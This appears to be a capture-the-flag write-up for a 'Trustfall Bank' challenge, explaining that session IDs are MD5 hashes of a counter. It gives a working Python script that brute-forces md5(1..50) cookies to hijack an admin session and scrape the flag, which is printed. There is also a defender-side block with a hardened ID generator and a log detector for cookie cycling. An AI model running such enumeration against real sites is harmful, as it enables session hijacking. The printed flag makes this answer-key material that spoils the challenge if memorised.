Trustfall Bank – TOKEN5
Token: PCCC{Welcome_Admin_pI_4120}
Background
Session IDs are MD5s of an incrementing counter in TinyDB. Brute-forcing
md5(1..50) as session_id hits the live admin session; visiting admin pages
yields the token.
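As an added defender-side example (not part of the original writeup and not the target's code), the Python below reimplements the counter-based scheme described above next to a hardened replacement, adds an audit check that recognises counter-derived IDs, and runs a cookie-cycling detector over constructed access-log lines. The log format, client addresses, function names and the 10,000-counter audit bound are assumptions made for the example.

```python
#!/usr/bin/env python3
# Added example: weak vs hardened session IDs, plus two defender checks.
# Not the Trustfall Bank code; the log format below is constructed.
import hashlib
import re
import secrets
from collections import defaultdict


def weak_session_id(counter: int) -> str:
    """The scheme the writeup describes: MD5 of an incrementing counter.
    Anyone who knows the scheme can enumerate every valid ID."""
    return hashlib.md5(str(counter).encode()).hexdigest()


def secure_session_id() -> str:
    """Hardened replacement: 256 bits from the OS CSPRNG, URL-safe encoded.
    Unpredictable, so enumeration is infeasible."""
    return secrets.token_urlsafe(32)


def counter_origin(session_id: str, max_counter: int = 10_000):
    """Audit check: if session_id equals md5(n) for some 1 <= n <= max_counter,
    return n; otherwise return None. Run it on cookies issued by an app under
    review to confirm that IDs are not counter-derived."""
    sid = session_id.strip().lower()
    if not re.fullmatch(r"[0-9a-f]{32}", sid):
        return None  # not even MD5-shaped, so not this scheme
    for n in range(1, max_counter + 1):
        if weak_session_id(n) == sid:
            return n
    return None


# Constructed access-log lines (assumed format: time client method path cookie).
# Client 10.0.0.9 presents a different session_id on every request, the
# pattern an enumeration attempt like the one in the writeup would leave.
SAMPLE_LOG = [
    "2024-05-01T10:00:00Z 10.0.0.9 GET /dashboard session_id=" + weak_session_id(n)
    for n in range(1, 8)
] + [
    "2024-05-01T10:00:03Z 10.0.0.2 GET /dashboard session_id=" + secure_session_id(),
    "2024-05-01T10:00:04Z 10.0.0.2 GET /account session_id=abc",
]

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) session_id=(\S+)$")


def find_session_cycling(lines, threshold: int = 5):
    """Detection: clients that present more than `threshold` distinct session
    IDs. A legitimate browser reuses one cookie; cycling IDs is a signature of
    session-ID guessing. Returns {client: distinct_id_count} for offenders."""
    ids_by_client = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        _, client, _, _, sid = m.groups()
        ids_by_client[client].add(sid)
    return {c: len(s) for c, s in ids_by_client.items() if len(s) > threshold}


if __name__ == "__main__":
    print("md5(1) =", weak_session_id(1), "-> counter", counter_origin(weak_session_id(1)))
    print("secure id:", secure_session_id(), "-> counter", counter_origin(secure_session_id()))
    print("cycling clients:", find_session_cycling(SAMPLE_LOG))
```

The audit function is deliberately linear in the counter bound: it is a review tool for a handful of cookies, not a service-side check. The fix for the application is the generator, not the detector; a session ID drawn from secrets.token_urlsafe cannot be recovered by counting.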
From Nothing to Working
- Review source: session IDs derive from an incrementing counter hashed with MD5.
- Iterate md5(1..50) as session_id cookies against /dashboard.
- When admin pages load without redirect, scrape for PCCC{...} to capture the token.
Command
python3 token5_admin_session.py
#!/usr/bin/env python3
# token5_admin_session.py
import hashlib, requests, re

TARGET = "http://trustfallbank.us"

def md5(n):
    # Session IDs in this challenge are md5(counter)
    return hashlib.md5(str(n).encode()).hexdigest()

def main():
    admin_paths = ["/dashboard", "/admin", "/admin/flag", "/flag"]
    for i in range(1, 51):  # md5(1..50), as described in the writeup
        sid = md5(i)
        s = requests.Session()
        s.cookies.set("session_id", sid)
        resp = s.get(f"{TARGET}/dashboard", allow_redirects=True)
        # An admin session renders the dashboard instead of bouncing to the login page
        if "admin" in resp.text.lower() and "login" not in resp.url:
            print(f"[+] Admin session found: counter={i}, sid={sid}")
            for path in admin_paths:
                r = s.get(f"{TARGET}{path}")
                m = re.search(r"PCCC\{[^}]+\}", r.text)
                if m:
                    print(f"[+] TOKEN 5: {m.group()} (from {path})")
                    return
            print("[!] Admin session found but token not visible; check pages manually.")
            return
        if i % 10 == 0:
            print(f"[*] Tried {i} session IDs...")
    print("[-] Admin session not found in first 50 IDs")

if __name__ == "__main__":
    main()
Expected Output
[+] Admin session found: counter=..., sid=...
[+] TOKEN 5: PCCC{Welcome_Admin_pI_4120}